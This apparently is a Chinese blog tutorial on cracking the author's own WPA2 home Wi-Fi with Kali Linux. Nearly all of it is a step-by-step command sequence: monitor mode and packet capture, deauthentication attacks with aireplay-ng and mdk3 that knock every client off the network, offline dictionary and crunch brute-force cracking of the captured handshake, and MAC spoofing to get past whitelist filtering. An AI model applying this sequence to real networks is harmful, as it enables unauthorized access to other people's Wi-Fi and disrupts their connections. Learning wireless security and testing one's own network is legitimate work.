无线wpa/wpa2渗透

案列介绍:

辣条对自家的wifi进行wpa2加密,并密码设置为“%123654#”,并启用mac地址(白名单)过滤,关闭wds功能,这里我会对我的无线进行渗透测试

硬件:
    tp-link无线路由器,一部华为手机(模拟正常用户上网),一台电脑(装载kali-linux),8187芯无线网卡(用于抓包和注入攻击)

软件:
    kali-linux,(macchanger,iwconfig,airmon-ng,airodump-ng,aireplay-ng,aircrack-ng)

第一步:混杂模式踩点(确认攻击目标)

    airmon-ng check kill
    airmon-ng start wlan0
    airodump-ng wlan0mon

第二步:监听(抓取正常用户的通信数据包)

    airodump-ng  --bssid  ***  -c  11  -w /tmp/test  wlan0mon #11是信道,**是路由器mac地址

第三步:注入攻击(踢掉合法用户,利用设备的自动的重连机制,捕获其握手包)

    aireplay-ng -0 0 -a  *** wlan0mon #对路由器全向攻击,导致所有正常用户掉线,这里的**也是路由器mac地址
    aireplay-ng -0 0 -a  *** -c *** wlan0mon  #单点攻击,前面的*是路由器mac,后面的*是客户端mac
    mdk3 wlan0mon d -s 120 -c 1,6,11         #踢掉所有的client

第四步:离线破解握手包

    aircrack-ng -w zidian.txt test01.cap   #用字典进行爆破,成功前提是字典合理
#或则不指定字典,直接实时匹配字符串组合,进行破解
    crunch 1 8 123456789 | aircrack-ng test01.cap -e Test -w -  #指定一个长度为8,使用字符串1到9进行组合,破解(-e 指定的是AP的ESSID,-w 指定的是密码字典 - 表示使用标准输入)

第五步:尝试登陆(由于无法登陆,我猜测是主人开启了mac地址过滤)

    airmon-ng stop wlan0mon
正常连接尝试

第六步:mac地址欺骗

airodump-ng  --bssid  ***  -c  11  -w /tmp/test  wlan0mon
记录下正常用户的mac地址
ifconfig wlan0 down
macchanger -m *mac* wlan0
ifconfig wlan0 up
尝试连接ok

科普系列

1、大多数无线网卡,不支持注入攻击
2、wds是一种安全快速连接机制,依赖与pin 码,并且pin码多是8位数字,按4:3:1进行分配

3、混杂模式:只有开启混杂模式才能抓取,周边无线的数据包
声明:本文为原创,作者为 辣条①号,转载时请保留本声明及附带文章链接:https://boke.wsfnk.com/archives/190.html
谢谢你请我吃辣条谢谢你请我吃辣条

如果文章对你有帮助,欢迎点击上方按钮打赏作者

最后编辑于:2022/12/3作者: 辣条①号

现在在做什么? 接下来打算做什么? 你的目标什么? 期限还有多少? 进度如何? 不负遇见,不谈亏欠!

暂无评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

arrow grin ! ? cool roll eek evil razz mrgreen smile oops lol mad twisted wink idea cry shock neutral sad ???

文章目录